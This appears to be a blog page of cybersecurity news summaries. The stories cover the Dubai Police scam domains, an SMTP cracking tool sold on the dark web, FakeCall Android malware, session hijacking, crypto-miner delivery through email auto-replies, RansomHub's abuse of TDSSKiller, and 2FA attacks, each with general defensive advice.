In the Dubai Police impersonation scam, attackers used automated domain generation algorithms (DGA) and bulk domain registration techniques to host malicious web pages. These domains, typically short-lived, make detection challenging. Investigations by BforeAI traced many of these domains to Tencent servers in Singapore.

Although Singapore is known for its strong cybersecurity measures, its status as a global tech hub makes it a prime location for cybercriminals to exploit legitimate platforms. Tencent, a China-based firm with a significant presence in Singapore, has faced scrutiny for its servers being previously linked to malicious activity.

Mitigating the Risks of Sophisticated Cyber Scams

To combat threats like the Dubai Police impersonation scam, organizations and individuals must adopt proactive cybersecurity measures:

  • Predictive phishing detection to identify threats early.
  • Employee training programs to enhance awareness.
  • Collaboration with local law enforcement and Computer Emergency Response Teams (CERTs).

Enhancing vigilance and implementing robust incident response plans can significantly mitigate risks. Additionally, cross-border cooperation and threat intelligence sharing are essential to address the globalized nature of cybercrime effectively.

Read more »
SMTP servers
Authentication Cyber Security Cyber Threats Cybersecurity Dark Web Data Privacy email encryption email security Malware Distribution Phishing Attacks SMTP servers

New SMTP Cracking Tool for 2024 Sold on Dark Web Sparks Email Security Alarm

 

A new method targeting SMTP (Simple Mail Transfer Protocol) servers, specifically updated for 2024, has surfaced for sale on the dark web, sparking significant concerns about email security and data privacy.

This cracking technique is engineered to bypass protective measures, enabling unauthorized access to email servers. Such breaches risk compromising personal, business, and government communications.

The availability of this tool showcases the growing sophistication of cybercriminals and their ability to exploit weaknesses in email defenses. Unauthorized access to SMTP servers not only exposes private correspondence but also facilitates phishing, spam campaigns, and cyber-espionage.

Experts caution that widespread use of this method could result in increased phishing attacks, credential theft, and malware distribution. "Organizations and individuals must prioritize strengthening email security protocols, implementing strong authentication, and closely monitoring for unusual server activity," they advise.

Mitigating these risks requires consistent updates to security patches, enforcing multi-factor authentication, and using email encryption. The emergence of this dark web listing highlights the ongoing threats cybercriminals pose to critical communication systems.

As attackers continue to innovate, the cybersecurity community emphasizes vigilance and proactive defense strategies to safeguard sensitive information. This development underscores the urgent need for robust email security measures in the face of evolving cyber threats.
Read more »
trending news
bank scams call scams Data Theft News Phishing Attacks Phising trending news

FakeCall Malware for Android Escalates Threat, Hijacks Outgoing Bank Calls

 

A newly evolved version of the FakeCall malware, a dangerous Android banking trojan, has been discovered hijacking users’ outgoing calls to their financial institutions, redirecting them to phone numbers controlled by attackers. The malware, first identified by Kaspersky in April 2022, focuses on voice phishing (vishing) scams, tricking victims into revealing sensitive banking information. 

The trojan presents a fake call interface that closely mimics Android’s default dialer, convincing victims they are communicating with legitimate bank representatives. 

This makes it challenging for users to discern the deception. When attempting to call their bank, the malware secretly redirects the call to attackers, who impersonate bank officials to steal personal information and money from accounts. A new report from Zimperium reveals that the latest FakeCall variant further enhances its capabilities. 

By tricking users into setting it as the default call handler during installation, the malware gains the ability to intercept both incoming and outgoing calls. In addition, the malware manipulates the Android user interface to show the bank’s actual phone number while connecting the victim to a scammer, deepening the illusion of legitimacy. The updated malware also adds new, though still developing, functionalities. 

It now uses Android’s Accessibility Service to simulate user actions, control the dialer interface, and automatically grant itself permissions. FakeCall’s operators have also introduced a Bluetooth listener and a screen state monitor, indicating ongoing development toward more advanced attack methods. Additional commands integrated into the latest version include capturing live screen content, taking screenshots, and accessing or deleting device images. 

These upgrades demonstrate the malware’s evolving sophistication, as it becomes harder to detect and remove. Security experts recommend avoiding the manual installation of Android apps through APKs, encouraging users to rely on the Google Play Store for app downloads. Though malware can still infiltrate Google Play, the platform’s security measures, such as Google Play Protect, can help identify and remove malicious apps when detected.
Read more »
token replay
Browser Security cloud apps Cyber Security identity-based attacks infostealers MFA Bypass Phishing Attacks session cookies Session Hijacking token replay

Session Hijacking Surges: Attackers Exploit MFA Gaps with Modern Tactics

 

As multi-factor authentication (MFA) becomes more common, attackers are increasingly resorting to session hijacking. Evidence from 2023 shows this trend: Microsoft detected 147,000 token replay attacks, marking a 111% increase year-over-year. Google reports that attacks on session cookies now rival traditional password-based threats.

Session hijacking has evolved from old Man-in-the-Middle (MitM) attacks, which relied on intercepting unsecured network traffic. Today, these attacks are internet-based, focusing on cloud apps and services. Modern session hijacking involves stealing session materials like cookies and tokens, enabling attackers to bypass standard security controls like VPNs, encrypted traffic, and even MFA.

The rise of identity-based attacks is a result of the growing complexity of user accounts, with each person managing multiple cloud-based services. Once attackers gain access to an active session, they can bypass MFA, leveraging the valid session tokens, which often stay active longer than expected.

Modern phishing toolkits, like AitM and BitM, make hijacking easier by allowing attackers to intercept MFA processes or trick users into controlling their browser. Infostealers, a newer tool, capture session cookies from the victim’s browser, putting multiple applications at risk, especially when EDR systems fail to detect them.

Infostealer infections are often traced back to unmanaged personal devices, which sync browser profiles with work devices, leading to the compromise of corporate credentials. EDRs aren’t always reliable in stopping these threats, and attackers can still resume stolen sessions without re-authentication, making it difficult for organizations to detect unauthorized access.

Passkeys offer some protection by preventing phishing, but infostealers bypass authentication entirely. While app-level controls exist to detect unauthorized sessions, many are inadequate. Companies are now considering browser-based solutions that monitor user agent strings for signs of session hijacking, offering a last line of defense against these sophisticated attacks.
Read more »
Phishing Attacks
Crypto Mining Crypto-Miner malware Malware Delivery. Phishing Attacks

Hackers Use Auto-reply to Deliver Crypto-miner Via Malicious Emails

Hackers Use Auto-reply to Deliver Crypto-miner Via Malicious Emails

Threat actors use new techniques to distribute malware, which is evolving constantly. In a recent attack, they used malicious e-mail auto-replies to deliver crypto-mining malware. Russian cybersecurity firm F.A.C.C.T. said that threat actors breached e-mail accounts and set up automatic replies containing links to cryptocurrency mining malware.

Auto-replies for Malware Distribution

In traditional malware distribution attacks, hackers used malicious downloads, compromised websites, and phishing emails. But the new attack method uses auto-replies, experts from F.A.C.C.T explained that the new technique was employed in delivering the Xmrig crypto-miner to workers at Russian tech companies, insurance firms, financial businesses, and retail marketplaces. Experts found 150 emails that contained Xmrig earlier this year. 

Cybercriminals Using New Methods

Dmitry Eremenko, senior analyst at F.A.C.C.T said “This method of malware delivery is dangerous because the potential victim initiates communication first. This is the main difference from traditional mass mailings, where the recipient often receives an irrelevant email and ignores it.” 

Despite not looking convincing, E-mails sent through auto-replies didn't raise suspicions. To avoid detection, the hackers used a scan of a real invoice for equipment payment, different than subject mail. It means the companies as well as users who are in contact with the breached mail can become targets. 

Use of cryptocurrency mining software

Xmrig is an open-source cryptocurrency mining software mainly used for mining Monero (XMR). Cybercriminals have been using new techniques to deliver Xmrig to target devices. For instance, in one campaign, the hackers used a pirated version of Final Cut Pro (a video editing software) to deploy the crypto-miner on Apple computers.

F.A.C.C.T doesn't have any information regarding the main culprit behind the attack and their success. Experts do believe that the breached email accounts had a history of their credentials leaked on darknet, including their data. Breached accounts include construction companies, a furniture factory, a farm, and small trading firms. 

To stay safe, the report suggests “do not save passwords in browsers, install unlicensed software, because it may contain stealers, do not follow dubious links in the mail and do not enter your data on dubious sites (phishing)

Read more »
Techhnology
Kaspersky Malicious Payload Phishing Attacks RansomHub Ransomware Techhnology

RansomHub Ransomware: Exploiting Trusted Tools to Evade Detection

RansomHub Ransomware: Exploiting Trusted Tools to Evade Detection

Ransomware groups continue to innovate and adapt their tactics to bypass security measures. One such group, RansomHub, reported by Malwarebytes, has recently garnered attention for its sophisticated approach to disabling Endpoint Detection and Response (EDR) systems. By leveraging Kaspersky’s TDSSKiller, a legitimate rootkit removal tool, RansomHub has managed to execute its malicious payloads undetected, posing a significant threat to organizations worldwide.

The Rise of RansomHub

RansomHub is a relatively new player in the ransomware scene, but it has quickly made a name for itself with its advanced techniques and targeted attacks. Unlike traditional ransomware groups that rely on brute force methods or simple phishing campaigns, RansomHub employs a more nuanced strategy. By using legitimate software tools in unexpected ways, they can evade detection and maximize the impact of their attacks.

The Role of Kaspersky’s TDSSKiller

Kaspersky’s TDSSKiller is a well-known tool in the cybersecurity community, designed to detect and remove rootkits from infected systems. Rootkits are a type of malware that can hide the presence of other malicious software, making them particularly dangerous. TDSSKiller is widely trusted and used by security professionals to clean compromised systems.

However, RansomHub has found a way to exploit this tool for malicious purposes. By incorporating TDSSKiller into their attack chain, they can disable EDR software that would otherwise detect and block their ransomware. This tactic is particularly insidious because it uses a trusted tool to carry out malicious actions, making it harder for security teams to identify and respond to the threat.

The Attack Chain

RansomHub’s attack chain typically begins with a phishing email or a compromised website that delivers the initial payload. Once the ransomware is on the target system, it uses a variety of techniques to escalate privileges and gain control over the machine. This is where TDSSKiller comes into play.

By running TDSSKiller, the ransomware can disable EDR software and other security measures that would normally detect and block the attack. With these defenses out of the way, RansomHub can then proceed to encrypt the victim’s files and demand a ransom for their release. In some cases, they also use a credential-harvesting tool called LaZagne to extract sensitive information, further increasing the pressure on the victim to pay the ransom.

Threats Posed by Tools

The use of legitimate tools like TDSSKiller in ransomware attacks highlights a significant challenge for the cybersecurity community. Traditional security measures are often designed to detect and block known malware and suspicious behavior. However, when attackers use trusted tools unexpectedly, these measures can be less effective.

This tactic also underscores the importance of a multi-layered approach to cybersecurity. Relying solely on EDR software or other endpoint protection measures is no longer sufficient. Organizations must implement a comprehensive security strategy that includes network monitoring, threat intelligence, and user education to detect and respond to these advanced threats.

Read more »
two-factor authentication
2FA security account protection Cyber Security Malware Threats man-in-the-middle Phishing Attacks two-factor authentication

How to Protect Your Accounts from 2FA Vulnerabilities: Avoid Common Security Pitfalls

 

Securing an account with only a username and password is insufficient because these can be easily stolen, guessed, or cracked. Therefore, two-factor authentication (2FA) is recommended for securing important accounts and has been a mandatory requirement for online banking for years.

2FA requires two distinct factors to access an account, network, or application, which can be from the following categories:
  • Knowledge: Something you know, like a password or PIN.
  • Possession: Something you have, such as a smartphone or security token like a Fido2 stick.
  • Biometrics: Something you are, including fingerprints or facial recognition.
For effective security, the two factors used in 2FA should come from different categories. If more than two factors are involved, it's referred to as multi-factor authentication. While 2FA significantly enhances security, it isn't completely foolproof. Cybercriminals have developed methods to exploit vulnerabilities in 2FA systems.

1. Man-in-the-Middle Attacks: Phishing for 2FA Codes
Despite the secure connection provided by Transport Layer Security (TLS), attackers can use various techniques to intercept the communication between the user and their account, known as "man-in-the-middle" attacks. A common approach involves phishing pages, where attackers create fake websites that resemble legitimate services to trick users into revealing their login credentials. These phishing sites can capture not only usernames and passwords but also the 2FA codes, allowing attackers to access accounts in real time. This type of attack is highly time-sensitive, as the one-time passwords used in 2FA typically expire quickly. Despite the complexity, criminals often use this method to steal money directly.

2. Man-in-the-Browser Attacks: Malware as a Middleman
A variation of man-in-the-middle attacks involves malware that integrates itself into the victim’s web browser. This malicious code waits for the user to log in to services like online banking and then manipulates transactions in the background. Although the user sees the correct transfer details in their browser, the malware has altered the transaction to divert funds elsewhere. Notable examples of such malware include Carberp, Emotet, Spyeye, and Zeus.

Prevention Tip: When authorizing transactions, always verify the transfer details, such as the amount and the recipient's IBAN, which are typically sent by banks during the 2FA process.

3. Social Engineering: Tricking Users Out of Their 2FA Codes
Attackers may already have access to usernames and passwords, possibly obtained from data breaches or through malware on the victim's device. To gain the second factor needed for access, they may resort to direct contact. For instance, they may pose as bank employees, claiming to need 2FA codes to implement a new security feature. If the victim complies, they unknowingly authorize a fraudulent transaction.

Prevention Tip: Never share your 2FA codes or authorizations with anyone, even if they claim to be from your bank or another trusted service. Legitimate service representatives will never ask for such confidential information.

Understanding these threats and remaining vigilant can significantly reduce the risks associated with 2FA vulnerabilities.
Read more »
Subscribe to: Posts (Atom)